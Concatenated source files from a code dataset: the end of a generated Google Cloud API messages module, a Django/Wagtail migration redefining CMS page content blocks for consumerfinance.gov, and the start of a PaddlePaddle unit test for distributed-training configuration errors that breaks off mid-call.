notTypeNames: not_type_names excludes the names + types. If a type+name is
in this list as well as match_type_names, it will not be selected.
"""
matchTypeNames = _messages.MessageField('TypedName', 1, repeated=True)
notTypeNames = _messages.MessageField('TypedName', 2, repeated=True)
class ServiceResourceBindingConfig(_messages.Message):
r"""Message for a binding between a Cloud Run service and a resource.
Messages:
BindingConfigValue: Any configs associated with the binding. e.g. "db-
name-env-name": "SQL_NAME".
Fields:
binding_config: Any configs associated with the binding. e.g. "db-name-
env-name": "SQL_NAME".
ref: Ref to another resource. Format: "/", e.g. "cloudsql/sql_db".
"""
@encoding.MapUnrecognizedFields('additionalProperties')
class BindingConfigValue(_messages.Message):
r"""Any configs associated with the binding. e.g. "db-name-env-name":
"SQL_NAME".
Messages:
AdditionalProperty: An additional property for a BindingConfigValue
object.
Fields:
additionalProperties: Additional properties of type BindingConfigValue
"""
class AdditionalProperty(_messages.Message):
r"""An additional property for a BindingConfigValue object.
Fields:
key: Name of the additional property.
value: A string attribute.
"""
key = _messages.StringField(1)
value = _messages.StringField(2)
additionalProperties = _messages.MessageField('AdditionalProperty', 1, repeated=True)
binding_config = _messages.MessageField('BindingConfigValue', 1)
ref = _messages.StringField(2)
class SetIamPolicyRequest(_messages.Message):
r"""Request message for `SetIamPolicy` method.
Fields:
policy: REQUIRED: The complete policy to be applied to the `resource`. The
size of the policy is limited to a few 10s of KB. An empty policy is a
valid policy but certain Cloud Platform services (such as Projects)
might reject them.
"""
policy = _messages.MessageField('Policy', 1)
class StandardQueryParameters(_messages.Message):
r"""Query parameters accepted by all methods.
Enums:
FXgafvValueValuesEnum: V1 error format.
AltValueValuesEnum: Data format for response.
Fields:
f__xgafv: V1 error format.
access_token: OAuth access token.
alt: Data format for response.
callback: JSONP
fields: Selector specifying which fields to include in a partial response.
key: API key. Your API key identifies your project and provides you with
API access, quota, and reports. Required unless you provide an OAuth 2.0
token.
oauth_token: OAuth 2.0 token for the current user.
prettyPrint: Returns response with indentations and line breaks.
quotaUser: Available to use for quota purposes for server-side
applications. Can be any arbitrary string assigned to a user, but should
not exceed 40 characters.
trace: A tracing token of the form "token:<tokenid>" to include in api
requests.
uploadType: Legacy upload protocol for media (e.g. "media", "multipart").
upload_protocol: Upload protocol for media (e.g. "raw", "multipart").
"""
class AltValueValuesEnum(_messages.Enum):
r"""Data format for response.
Values:
json: Responses with Content-Type of application/json
media: Media download with context-dependent Content-Type
proto: Responses with Content-Type of application/x-protobuf
"""
json = 0
media = 1
proto = 2
class FXgafvValueValuesEnum(_messages.Enum):
r"""V1 error format.
Values:
_1: v1 error format
_2: v2 error format
"""
_1 = 0
_2 = 1
f__xgafv = _messages.EnumField('FXgafvValueValuesEnum', 1)
access_token = _messages.StringField(2)
alt = _messages.EnumField('AltValueValuesEnum', 3, default='json')
callback = _messages.StringField(4)
fields = _messages.StringField(5)
key = _messages.StringField(6)
oauth_token = _messages.StringField(7)
prettyPrint = _messages.BooleanField(8, default=True)
quotaUser = _messages.StringField(9)
trace = _messages.StringField(10)
uploadType = _messages.StringField(11)
upload_protocol = _messages.StringField(12)
class Status(_messages.Message):
r"""The `Status` type defines a logical error model that is suitable for
different programming environments, including REST APIs and RPC APIs. It is
used by [gRPC](https://github.com/grpc). Each `Status` message contains
three pieces of data: error code, error message, and error details. You can
find out more about this error model and how to work with it in the [API
Design Guide](https://cloud.google.com/apis/design/errors).
Messages:
DetailsValueListEntry: A DetailsValueListEntry object.
Fields:
code: The status code, which should be an enum value of google.rpc.Code.
details: A list of messages that carry the error details. There is a
common set of message types for APIs to use.
message: A developer-facing error message, which should be in English. Any
user-facing error message should be localized and sent in the
google.rpc.Status.details field, or localized by the client.
"""
@encoding.MapUnrecognizedFields('additionalProperties')
class DetailsValueListEntry(_messages.Message):
r"""A DetailsValueListEntry object.
Messages:
AdditionalProperty: An additional property for a DetailsValueListEntry
object.
Fields:
additionalProperties: Properties of the object. Contains field @type
with type URL.
"""
class AdditionalProperty(_messages.Message):
r"""An additional property for a DetailsValueListEntry object.
Fields:
key: Name of the additional property.
value: A extra_types.JsonValue attribute.
"""
key = _messages.StringField(1)
value = _messages.MessageField('extra_types.JsonValue', 2)
additionalProperties = _messages.MessageField('AdditionalProperty', 1, repeated=True)
code = _messages.IntegerField(1, variant=_messages.Variant.INT32)
details = _messages.MessageField('DetailsValueListEntry', 2, repeated=True)
message = _messages.StringField(3)
class Target(_messages.Message):
r"""A type of persisted data store to which Render outputs.
Fields:
cloudStorage: A Cloud Storage target location.
"""
cloudStorage = _messages.MessageField('CloudStorage', 1)
class TestIamPermissionsRequest(_messages.Message):
r"""Request message for `TestIamPermissions` method.
Fields:
permissions: The set of permissions to check for the `resource`.
Permissions with wildcards (such as '*' or 'storage.*') are not allowed.
For more information see [IAM
Overview](https://cloud.google.com/iam/docs/overview#permissions).
"""
permissions = _messages.StringField(1, repeated=True)
class TestIamPermissionsResponse(_messages.Message):
r"""Response message for `TestIamPermissions` method.
Fields:
permissions: A subset of `TestPermissionsRequest.permissions` that the
caller is allowed.
"""
permissions = _messages.StringField(1, repeated=True)
class TypedName(_messages.Message):
r"""TypedName is a resource name + its type. Next tag: 3
Fields:
name: The name of the resource.
type: The type of the resource.
"""
name = _messages.StringField(1)
type = _messages.StringField(2)
class VPCConfig(_messages.Message):
r"""Message for VPC configs.
Fields:
network: Network is an existing network name. If omitted, a new network
will be created for the application.
"""
network = _messages.StringField(1)
encoding.AddCustomJsonFieldMapping(
CloudSqlSettings, 'activation_policy', 'activation-policy')
encoding.AddCustomJsonFieldMapping(
CloudSqlSettings, 'availability_type', 'availability-type')
encoding.AddCustomJsonFieldMapping(
CloudSqlSettings, 'disk_size', 'disk-size')
encoding.AddCustomJsonFieldMapping(
CloudSqlSettings, 'disk_type', 'disk-type')
encoding.AddCustomJsonFieldMapping(
RedisInstanceConfig, 'memory_size_gb', 'memory-size-gb')
encoding.AddCustomJsonFieldMapping(
RedisInstanceConfig, 'redis_parameters', 'redis-parameters')
encoding.AddCustomJsonFieldMapping(
RouterConfig, 'default_route', 'default-route')
encoding.AddCustomJsonFieldMapping(
RouterConfig, 'dns_zone', 'dns-zone')
encoding.AddCustomJsonFieldMapping(
ServiceResourceBindingConfig, 'binding_config', 'binding-config')
encoding.AddCustomJsonFieldMapping(
StandardQueryParameters, 'f__xgafv', '$.xgafv')
encoding.AddCustomJsonEnumMapping(
StandardQueryParameters.FXgafvValueValuesEnum, '_1', '1')
encoding.AddCustomJsonEnumMapping(
StandardQueryParameters.FXgafvValueValuesEnum, '_2', '2')
| 39.359316 | 93 | 0.740505 |
118d32c90ef5d04148a56b70f2b75c7b002feb9d | 23,762 | py | Python | cfgov/v1/migrations/0264_add_filters_help_text.py | adebisi-aden/consumerfinance.gov | 8c0f5afac341823c59f73b0c6bd60592e0f5eaca | [
"CC0-1.0"
] | 37 | 2020-08-18T19:52:39.000Z | 2022-03-23T08:08:41.000Z | cfgov/v1/migrations/0264_add_filters_help_text.py | adebisi-aden/consumerfinance.gov | 8c0f5afac341823c59f73b0c6bd60592e0f5eaca | [
"CC0-1.0"
] | 338 | 2020-08-14T20:46:36.000Z | 2022-03-31T20:49:32.000Z | cfgov/v1/migrations/0264_add_filters_help_text.py | adebisi-aden/consumerfinance.gov | 8c0f5afac341823c59f73b0c6bd60592e0f5eaca | [
"CC0-1.0"
] | 14 | 2020-10-21T15:27:03.000Z | 2022-03-17T03:16:36.000Z | # Generated by Django 2.2.23 on 2021-07-06 21:53
from django.db import migrations
import v1.atomic_elements.organisms
import v1.blocks
import v1.util.ref
import wagtail.core.blocks
import wagtail.core.fields
import wagtail.images.blocks
class Migration(migrations.Migration):
dependencies = [
('v1', '0263_add_default_empty_list_for_213_prep'),
]
operations = [
migrations.AlterField(
model_name='browsefilterablepage',
name='content',
field=wagtail.core.fields.StreamField([('full_width_text', wagtail.core.blocks.StreamBlock([('content', wagtail.core.blocks.RichTextBlock(icon='edit')), ('content_with_anchor', wagtail.core.blocks.StructBlock([('content_block', wagtail.core.blocks.RichTextBlock()), ('anchor_link', wagtail.core.blocks.StructBlock([('link_id', wagtail.core.blocks.CharBlock(help_text='\n ID will be auto-generated on save.\n However, you may enter some human-friendly text that\n will be incorporated to make it easier to read.\n ', label='ID for this content block', required=False))]))])), ('heading', wagtail.core.blocks.StructBlock([('text', v1.blocks.HeadingTextBlock(required=False)), ('level', wagtail.core.blocks.ChoiceBlock(choices=[('h2', 'H2'), ('h3', 'H3'), ('h4', 'H4')])), ('icon', v1.blocks.HeadingIconBlock(help_text='Input the name of an icon to appear to the left of the heading. E.g., approved, help-round, etc. <a href="https://cfpb.github.io/design-system/foundation/iconography">See full list of icons</a>', required=False))], required=False)), ('image', wagtail.core.blocks.StructBlock([('image', wagtail.core.blocks.StructBlock([('upload', wagtail.images.blocks.ImageChooserBlock(required=False)), ('alt', wagtail.core.blocks.CharBlock(help_text="If the image is decorative (i.e., if a screenreader wouldn't have anything useful to say about it), leave the Alt field blank.", required=False))])), ('image_width', wagtail.core.blocks.ChoiceBlock(choices=[('full', 'Full width'), (470, '470px'), (270, '270px'), (170, '170px'), ('bleed', 'Bleed into left/right margins')])), ('image_position', wagtail.core.blocks.ChoiceBlock(choices=[('right', 'right'), ('left', 'left')], help_text='Does not apply if the image is full-width')), ('text', wagtail.core.blocks.RichTextBlock(label='Caption', required=False)), ('is_bottom_rule', wagtail.core.blocks.BooleanBlock(default=True, help_text='Check to add a horizontal rule line to bottom of inset.', label='Has bottom rule line', required=False))])), ('table_block', v1.atomic_elements.organisms.AtomicTableBlock(table_options={'renderer': 'html'})), ('quote', wagtail.core.blocks.StructBlock([('body', wagtail.core.blocks.TextBlock()), ('citation', wagtail.core.blocks.TextBlock(required=False)), ('is_large', wagtail.core.blocks.BooleanBlock(required=False))])), ('cta', wagtail.core.blocks.StructBlock([('slug_text', wagtail.core.blocks.CharBlock(required=False)), ('paragraph_text', wagtail.core.blocks.RichTextBlock(required=False)), ('button', wagtail.core.blocks.StructBlock([('text', wagtail.core.blocks.CharBlock(required=False)), ('aria_label', wagtail.core.blocks.CharBlock(help_text='Add an ARIA label if the link text does not describe the destination of the link (e.g. has ambiguous text like "Learn more" that is not descriptive on its own).', required=False)), ('url', wagtail.core.blocks.CharBlock(default='/', required=False)), ('size', wagtail.core.blocks.ChoiceBlock(choices=[('regular', 'Regular'), ('large', 'Large Primary')]))]))])), ('related_links', wagtail.core.blocks.StructBlock([('heading', wagtail.core.blocks.CharBlock(required=False)), ('paragraph', wagtail.core.blocks.RichTextBlock(required=False)), ('links', wagtail.core.blocks.ListBlock(wagtail.core.blocks.StructBlock([('text', wagtail.core.blocks.CharBlock(required=False)), ('aria_label', wagtail.core.blocks.CharBlock(help_text='Add an ARIA label if the link text does not describe the destination of the link (e.g. has ambiguous text like "Learn more" that is not descriptive on its own).', required=False)), ('url', wagtail.core.blocks.CharBlock(default='/', required=False))])))])), ('reusable_text', v1.blocks.ReusableTextChooserBlock('v1.ReusableText')), ('email_signup', wagtail.core.blocks.StructBlock([('heading', wagtail.core.blocks.CharBlock(default='Stay informed', required=False)), ('default_heading', wagtail.core.blocks.BooleanBlock(default=True, help_text='If selected, heading will be styled as an H5 with green top rule. Deselect to style header as H3.', label='Default heading style', required=False)), ('text', wagtail.core.blocks.CharBlock(help_text='Write a sentence or two about what kinds of emails the user is signing up for, how frequently they will be sent, etc.', required=False)), ('gd_code', wagtail.core.blocks.CharBlock(help_text='Code for the topic (i.e., mailing list) you want people who submit this form to subscribe to. Format: USCFPB_###', label='GovDelivery code', required=False)), ('disclaimer_page', wagtail.core.blocks.PageChooserBlock(help_text='Choose the page that the "See Privacy Act statement" link should go to. If in doubt, use "Generic Email Sign-Up Privacy Act Statement".', label='Privacy Act statement', required=False))])), ('well', wagtail.core.blocks.StructBlock([('content', wagtail.core.blocks.RichTextBlock(label='Well', required=False))])), ('well_with_ask_search', wagtail.core.blocks.StructBlock([('content', wagtail.core.blocks.RichTextBlock(label='Well', required=False)), ('ask_search', wagtail.core.blocks.StructBlock([('show_label', wagtail.core.blocks.BooleanBlock(default=True, help_text='Whether to show form label.', required=False)), ('placeholder', wagtail.core.blocks.TextBlock(help_text='Text to show for the input placeholder text.', required=False))]))]))])), ('filter_controls', wagtail.core.blocks.StructBlock([('label', wagtail.core.blocks.CharBlock(required=False)), ('is_bordered', wagtail.core.blocks.BooleanBlock(required=False)), ('is_midtone', wagtail.core.blocks.BooleanBlock(required=False)), ('is_expanded', wagtail.core.blocks.BooleanBlock(required=False)), ('no_posts_message', wagtail.core.blocks.CharBlock(help_text='Message for the <a href="https://cfpb.github.io/design-system/components/notifications#default-base-notification">notification</a> that will be displayed instead of filter controls if there are no posts to filter.', required=False)), ('no_posts_explanation', wagtail.core.blocks.CharBlock(help_text='Additional explanation for the notification that will be displayed if there are no posts to filter.', required=False)), ('post_date_description', wagtail.core.blocks.CharBlock(help_text='Strongly encouraged to help users understand the action that the date of the post is linked to, i.e. published, issued, released.', label='Date stamp descriptor', required=False)), ('title', wagtail.core.blocks.BooleanBlock(default=True, help_text='Whether to include a "Search by keyword" filter in the filter controls.', label='Filter by keyword', required=False)), ('categories', wagtail.core.blocks.StructBlock([('filter_category', wagtail.core.blocks.BooleanBlock(default=True, help_text='Whether to include a "Category" filter in the filter controls.', label='Filter by Category', required=False)), ('show_preview_categories', wagtail.core.blocks.BooleanBlock(default=True, required=False)), ('page_type', wagtail.core.blocks.ChoiceBlock(choices=v1.util.ref.filterable_list_page_types, required=False))])), ('topic_filtering', wagtail.core.blocks.ChoiceBlock(choices=[('no_filter', "Don't filter topics"), ('sort_alphabetically', 'Filter topics, sort topic list alphabetically'), ('sort_by_frequency', 'Filter topics, sort topic list by number of results')], help_text='Whether to include a "Topics" filter in the filter controls')), ('order_by', wagtail.core.blocks.ChoiceBlock(choices=[('-date_published', 'Date Published'), ('_score', 'Relevance')], help_text='How to order results')), ('statuses', wagtail.core.blocks.BooleanBlock(default=False, help_text='Whether to include a "Status" filter in the filter controls. Only enable if using on an enforcement actions filterable list.', label='Filter by Enforcement Statuses', required=False)), ('products', wagtail.core.blocks.BooleanBlock(default=False, help_text='Whether to include a "Product" filter in the filter controls. Only enable if using on an enforcement actions filterable list.', label='Filter by Enforcement Products', required=False)), ('authors', wagtail.core.blocks.BooleanBlock(default=True, label='Filter Authors', required=False)), ('date_range', wagtail.core.blocks.BooleanBlock(default=True, help_text='Whether to include a set of "Date range" filters in the filter controls.', label='Filter by Date Range', required=False)), ('output_5050', wagtail.core.blocks.BooleanBlock(default=False, label='Render preview items as 50-50s', required=False)), ('link_image_and_heading', wagtail.core.blocks.BooleanBlock(default=False, help_text='Add links to post preview images and headings in filterable list results', required=False)), ('filter_children', wagtail.core.blocks.BooleanBlock(default=True, help_text='If checked this list will only filter its child pages. If both children and siblings are checked, only child pages will be filtered.', required=False))])), ('feedback', wagtail.core.blocks.StructBlock([('was_it_helpful_text', wagtail.core.blocks.CharBlock(default='Was this page helpful to you?', help_text='Use this field only for feedback forms that use "Was this helpful?" radio buttons.', required=False)), ('intro_text', wagtail.core.blocks.CharBlock(help_text='Optional feedback intro', required=False)), ('question_text', wagtail.core.blocks.CharBlock(help_text='Optional expansion on intro', required=False)), ('radio_intro', wagtail.core.blocks.CharBlock(help_text='Leave blank unless you are building a feedback form with extra radio-button prompts, as in /owning-a-home/help-us-improve/.', required=False)), ('radio_text', wagtail.core.blocks.CharBlock(default='This information helps us understand your question better.', required=False)), ('radio_question_1', wagtail.core.blocks.CharBlock(default='How soon do you expect to buy a home?', required=False)), ('radio_question_2', wagtail.core.blocks.CharBlock(default='Do you currently own a home?', required=False)), ('button_text', wagtail.core.blocks.CharBlock(default='Submit')), ('contact_advisory', wagtail.core.blocks.RichTextBlock(help_text='Use only for feedback forms that ask for a contact email', required=False))]))]),
),
migrations.AlterField(
model_name='sublandingfilterablepage',
name='content',
field=wagtail.core.fields.StreamField([('text_introduction', wagtail.core.blocks.StructBlock([('eyebrow', wagtail.core.blocks.CharBlock(help_text='Optional: Adds an H5 eyebrow above H1 heading text. Only use in conjunction with heading.', label='Pre-heading', required=False)), ('heading', wagtail.core.blocks.CharBlock(required=False)), ('intro', wagtail.core.blocks.RichTextBlock(required=False)), ('body', wagtail.core.blocks.RichTextBlock(required=False)), ('links', wagtail.core.blocks.ListBlock(wagtail.core.blocks.StructBlock([('text', wagtail.core.blocks.CharBlock(required=False)), ('aria_label', wagtail.core.blocks.CharBlock(help_text='Add an ARIA label if the link text does not describe the destination of the link (e.g. has ambiguous text like "Learn more" that is not descriptive on its own).', required=False)), ('url', wagtail.core.blocks.CharBlock(default='/', required=False))]), required=False)), ('has_rule', wagtail.core.blocks.BooleanBlock(help_text='Check this to add a horizontal rule line to bottom of text introduction.', label='Has bottom rule', required=False))])), ('full_width_text', wagtail.core.blocks.StreamBlock([('content', wagtail.core.blocks.RichTextBlock(icon='edit')), ('content_with_anchor', wagtail.core.blocks.StructBlock([('content_block', wagtail.core.blocks.RichTextBlock()), ('anchor_link', wagtail.core.blocks.StructBlock([('link_id', wagtail.core.blocks.CharBlock(help_text='\n ID will be auto-generated on save.\n However, you may enter some human-friendly text that\n will be incorporated to make it easier to read.\n ', label='ID for this content block', required=False))]))])), ('heading', wagtail.core.blocks.StructBlock([('text', v1.blocks.HeadingTextBlock(required=False)), ('level', wagtail.core.blocks.ChoiceBlock(choices=[('h2', 'H2'), ('h3', 'H3'), ('h4', 'H4')])), ('icon', v1.blocks.HeadingIconBlock(help_text='Input the name of an icon to appear to the left of the heading. E.g., approved, help-round, etc. <a href="https://cfpb.github.io/design-system/foundation/iconography">See full list of icons</a>', required=False))], required=False)), ('image', wagtail.core.blocks.StructBlock([('image', wagtail.core.blocks.StructBlock([('upload', wagtail.images.blocks.ImageChooserBlock(required=False)), ('alt', wagtail.core.blocks.CharBlock(help_text="If the image is decorative (i.e., if a screenreader wouldn't have anything useful to say about it), leave the Alt field blank.", required=False))])), ('image_width', wagtail.core.blocks.ChoiceBlock(choices=[('full', 'Full width'), (470, '470px'), (270, '270px'), (170, '170px'), ('bleed', 'Bleed into left/right margins')])), ('image_position', wagtail.core.blocks.ChoiceBlock(choices=[('right', 'right'), ('left', 'left')], help_text='Does not apply if the image is full-width')), ('text', wagtail.core.blocks.RichTextBlock(label='Caption', required=False)), ('is_bottom_rule', wagtail.core.blocks.BooleanBlock(default=True, help_text='Check to add a horizontal rule line to bottom of inset.', label='Has bottom rule line', required=False))])), ('table_block', v1.atomic_elements.organisms.AtomicTableBlock(table_options={'renderer': 'html'})), ('quote', wagtail.core.blocks.StructBlock([('body', wagtail.core.blocks.TextBlock()), ('citation', wagtail.core.blocks.TextBlock(required=False)), ('is_large', wagtail.core.blocks.BooleanBlock(required=False))])), ('cta', wagtail.core.blocks.StructBlock([('slug_text', wagtail.core.blocks.CharBlock(required=False)), ('paragraph_text', wagtail.core.blocks.RichTextBlock(required=False)), ('button', wagtail.core.blocks.StructBlock([('text', wagtail.core.blocks.CharBlock(required=False)), ('aria_label', wagtail.core.blocks.CharBlock(help_text='Add an ARIA label if the link text does not describe the destination of the link (e.g. has ambiguous text like "Learn more" that is not descriptive on its own).', required=False)), ('url', wagtail.core.blocks.CharBlock(default='/', required=False)), ('size', wagtail.core.blocks.ChoiceBlock(choices=[('regular', 'Regular'), ('large', 'Large Primary')]))]))])), ('related_links', wagtail.core.blocks.StructBlock([('heading', wagtail.core.blocks.CharBlock(required=False)), ('paragraph', wagtail.core.blocks.RichTextBlock(required=False)), ('links', wagtail.core.blocks.ListBlock(wagtail.core.blocks.StructBlock([('text', wagtail.core.blocks.CharBlock(required=False)), ('aria_label', wagtail.core.blocks.CharBlock(help_text='Add an ARIA label if the link text does not describe the destination of the link (e.g. has ambiguous text like "Learn more" that is not descriptive on its own).', required=False)), ('url', wagtail.core.blocks.CharBlock(default='/', required=False))])))])), ('reusable_text', v1.blocks.ReusableTextChooserBlock('v1.ReusableText')), ('email_signup', wagtail.core.blocks.StructBlock([('heading', wagtail.core.blocks.CharBlock(default='Stay informed', required=False)), ('default_heading', wagtail.core.blocks.BooleanBlock(default=True, help_text='If selected, heading will be styled as an H5 with green top rule. Deselect to style header as H3.', label='Default heading style', required=False)), ('text', wagtail.core.blocks.CharBlock(help_text='Write a sentence or two about what kinds of emails the user is signing up for, how frequently they will be sent, etc.', required=False)), ('gd_code', wagtail.core.blocks.CharBlock(help_text='Code for the topic (i.e., mailing list) you want people who submit this form to subscribe to. Format: USCFPB_###', label='GovDelivery code', required=False)), ('disclaimer_page', wagtail.core.blocks.PageChooserBlock(help_text='Choose the page that the "See Privacy Act statement" link should go to. If in doubt, use "Generic Email Sign-Up Privacy Act Statement".', label='Privacy Act statement', required=False))])), ('well', wagtail.core.blocks.StructBlock([('content', wagtail.core.blocks.RichTextBlock(label='Well', required=False))])), ('well_with_ask_search', wagtail.core.blocks.StructBlock([('content', wagtail.core.blocks.RichTextBlock(label='Well', required=False)), ('ask_search', wagtail.core.blocks.StructBlock([('show_label', wagtail.core.blocks.BooleanBlock(default=True, help_text='Whether to show form label.', required=False)), ('placeholder', wagtail.core.blocks.TextBlock(help_text='Text to show for the input placeholder text.', required=False))]))]))])), ('filter_controls', wagtail.core.blocks.StructBlock([('label', wagtail.core.blocks.CharBlock(required=False)), ('is_bordered', wagtail.core.blocks.BooleanBlock(required=False)), ('is_midtone', wagtail.core.blocks.BooleanBlock(required=False)), ('is_expanded', wagtail.core.blocks.BooleanBlock(required=False)), ('no_posts_message', wagtail.core.blocks.CharBlock(help_text='Message for the <a href="https://cfpb.github.io/design-system/components/notifications#default-base-notification">notification</a> that will be displayed instead of filter controls if there are no posts to filter.', required=False)), ('no_posts_explanation', wagtail.core.blocks.CharBlock(help_text='Additional explanation for the notification that will be displayed if there are no posts to filter.', required=False)), ('post_date_description', wagtail.core.blocks.CharBlock(help_text='Strongly encouraged to help users understand the action that the date of the post is linked to, i.e. published, issued, released.', label='Date stamp descriptor', required=False)), ('title', wagtail.core.blocks.BooleanBlock(default=True, help_text='Whether to include a "Search by keyword" filter in the filter controls.', label='Filter by keyword', required=False)), ('categories', wagtail.core.blocks.StructBlock([('filter_category', wagtail.core.blocks.BooleanBlock(default=True, help_text='Whether to include a "Category" filter in the filter controls.', label='Filter by Category', required=False)), ('show_preview_categories', wagtail.core.blocks.BooleanBlock(default=True, required=False)), ('page_type', wagtail.core.blocks.ChoiceBlock(choices=v1.util.ref.filterable_list_page_types, required=False))])), ('topic_filtering', wagtail.core.blocks.ChoiceBlock(choices=[('no_filter', "Don't filter topics"), ('sort_alphabetically', 'Filter topics, sort topic list alphabetically'), ('sort_by_frequency', 'Filter topics, sort topic list by number of results')], help_text='Whether to include a "Topics" filter in the filter controls')), ('order_by', wagtail.core.blocks.ChoiceBlock(choices=[('-date_published', 'Date Published'), ('_score', 'Relevance')], help_text='How to order results')), ('statuses', wagtail.core.blocks.BooleanBlock(default=False, help_text='Whether to include a "Status" filter in the filter controls. Only enable if using on an enforcement actions filterable list.', label='Filter by Enforcement Statuses', required=False)), ('products', wagtail.core.blocks.BooleanBlock(default=False, help_text='Whether to include a "Product" filter in the filter controls. Only enable if using on an enforcement actions filterable list.', label='Filter by Enforcement Products', required=False)), ('authors', wagtail.core.blocks.BooleanBlock(default=True, label='Filter Authors', required=False)), ('date_range', wagtail.core.blocks.BooleanBlock(default=True, help_text='Whether to include a set of "Date range" filters in the filter controls.', label='Filter by Date Range', required=False)), ('output_5050', wagtail.core.blocks.BooleanBlock(default=False, label='Render preview items as 50-50s', required=False)), ('link_image_and_heading', wagtail.core.blocks.BooleanBlock(default=False, help_text='Add links to post preview images and headings in filterable list results', required=False)), ('filter_children', wagtail.core.blocks.BooleanBlock(default=True, help_text='If checked this list will only filter its child pages. If both children and siblings are checked, only child pages will be filtered.', required=False))])), ('featured_content', wagtail.core.blocks.StructBlock([('heading', wagtail.core.blocks.CharBlock()), ('body', wagtail.core.blocks.TextBlock(help_text='Line breaks will be ignored.')), ('post', wagtail.core.blocks.PageChooserBlock(required=False)), ('show_post_link', wagtail.core.blocks.BooleanBlock(label='Render post link?', required=False)), ('post_link_text', wagtail.core.blocks.CharBlock(required=False)), ('image', wagtail.core.blocks.StructBlock([('upload', wagtail.images.blocks.ImageChooserBlock(required=False)), ('alt', wagtail.core.blocks.CharBlock(help_text="If the image is decorative (i.e., if a screenreader wouldn't have anything useful to say about it), leave the Alt field blank.", required=False))])), ('links', wagtail.core.blocks.ListBlock(wagtail.core.blocks.StructBlock([('text', wagtail.core.blocks.CharBlock(required=False)), ('aria_label', wagtail.core.blocks.CharBlock(help_text='Add an ARIA label if the link text does not describe the destination of the link (e.g. has ambiguous text like "Learn more" that is not descriptive on its own).', required=False)), ('url', wagtail.core.blocks.CharBlock(default='/', required=False))]), label='Additional Links')), ('video', wagtail.core.blocks.StructBlock([('video_id', wagtail.core.blocks.RegexBlock(error_messages={'invalid': 'The YouTube video ID is in the wrong format.'}, help_text='Enter the YouTube video ID, which is located at the end of the video URL, after "v=". For example, the video ID for https://www.youtube.com/watch?v=1V0Ax9OIc84 is 1V0Ax9OIc84.', label='YouTube video ID', regex='^[\\w-]{11}$', required=False)), ('thumbnail_image', wagtail.images.blocks.ImageChooserBlock(help_text='Optional thumbnail image to show before and after the video plays. If the thumbnail image is not set here, the video player will default to showing the thumbnail that was set in (or automatically chosen by) YouTube.', required=False))], required=False))])), ('feedback', wagtail.core.blocks.StructBlock([('was_it_helpful_text', wagtail.core.blocks.CharBlock(default='Was this page helpful to you?', help_text='Use this field only for feedback forms that use "Was this helpful?" radio buttons.', required=False)), ('intro_text', wagtail.core.blocks.CharBlock(help_text='Optional feedback intro', required=False)), ('question_text', wagtail.core.blocks.CharBlock(help_text='Optional expansion on intro', required=False)), ('radio_intro', wagtail.core.blocks.CharBlock(help_text='Leave blank unless you are building a feedback form with extra radio-button prompts, as in /owning-a-home/help-us-improve/.', required=False)), ('radio_text', wagtail.core.blocks.CharBlock(default='This information helps us understand your question better.', required=False)), ('radio_question_1', wagtail.core.blocks.CharBlock(default='How soon do you expect to buy a home?', required=False)), ('radio_question_2', wagtail.core.blocks.CharBlock(default='Do you currently own a home?', required=False)), ('button_text', wagtail.core.blocks.CharBlock(default='Submit')), ('contact_advisory', wagtail.core.blocks.RichTextBlock(help_text='Use only for feedback forms that ask for a contact email', required=False))]))]),
),
]
| 792.066667 | 13,060 | 0.759742 |
139ce121ad58718f508d95b212daaf7db592a1a4 | 11,165 | py | Python | python/paddle/fluid/tests/unittests/test_fleet_api_input.py | L-Net-1992/Paddle | 4d0ca02ba56760b456f3d4b42a538555b9b6c307 | [
"Apache-2.0"
] | 11 | 2016-08-29T07:43:26.000Z | 2016-08-29T07:51:24.000Z | python/paddle/fluid/tests/unittests/test_fleet_api_input.py | L-Net-1992/Paddle | 4d0ca02ba56760b456f3d4b42a538555b9b6c307 | [
"Apache-2.0"
] | null | null | null | python/paddle/fluid/tests/unittests/test_fleet_api_input.py | L-Net-1992/Paddle | 4d0ca02ba56760b456f3d4b42a538555b9b6c307 | [
"Apache-2.0"
] | 1 | 2021-12-09T08:59:17.000Z | 2021-12-09T08:59:17.000Z | # Copyright (c) 2018 PaddlePaddle Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from __future__ import print_function
import unittest
import paddle.fluid as fluid
from paddle.fluid.transpiler.distribute_transpiler import DistributeTranspilerConfig
from paddle.fluid.incubate.fleet.base.role_maker import UserDefinedRoleMaker
from paddle.fluid.incubate.fleet.base.role_maker import UserDefinedCollectiveRoleMaker
from paddle.fluid.incubate.fleet.base.role_maker import Role
import paddle.fluid.incubate.fleet.base.role_maker as role_maker
from paddle.fluid.incubate.fleet.parameter_server.distribute_transpiler import fleet
from paddle.fluid.incubate.fleet.parameter_server import TranspilerOptimizer
from paddle.fluid.incubate.fleet.collective import CollectiveOptimizer
from dist_simnet_bow import train_network
class DistributeTranspilerConfigTest(unittest.TestCase):
def set_runtime_split_send_recv(self, config, value):
config.runtime_split_send_recv = value
def set_sync_mode(self, config, value):
config.sync_mode = value
def testConfig(self):
config = DistributeTranspilerConfig()
self.assertRaises(Exception, self.set_sync_mode, config, None)
self.assertRaises(Exception, self.set_runtime_split_send_recv, config,
None)
self.assertRaises(Exception, self.set_runtime_split_send_recv, config,
True)
self.set_sync_mode(config, False)
self.assertFalse(config.sync_mode)
self.set_runtime_split_send_recv(config, True)
self.assertRaises(Exception, self.set_sync_mode, config, True)
class FleetTest(unittest.TestCase):
def testInvalidInputs(self):
self.assertRaises(Exception, fleet.split_files, "files")
self.assertRaises(Exception, fleet.init, "pserver")
data = fluid.layers.data(name='X', shape=[1], dtype='float32')
hidden = fluid.layers.fc(input=data, size=10)
loss = fluid.layers.mean(hidden)
adam = fluid.optimizer.Adam()
adam.minimize(loss)
place = fluid.CPUPlace()
exe = fluid.Executor(place)
pe = fluid.ParallelExecutor(use_cuda=False, loss_name=loss.name)
self.assertRaises(Exception,
fleet.save_inference_model,
dirname='/tmp/',
feeded_var_names=['X'],
target_vars=[loss],
executor=pe)
self.assertRaises(Exception,
fleet.save_inference_model,
dirname='/tmp/',
feeded_var_names=['X'],
target_vars=[loss],
executor="executor")
compiled_prog = fluid.compiler.CompiledProgram(
fluid.default_main_program())
self.assertRaises(Exception,
fleet.save_inference_model,
dirname='/tmp/',
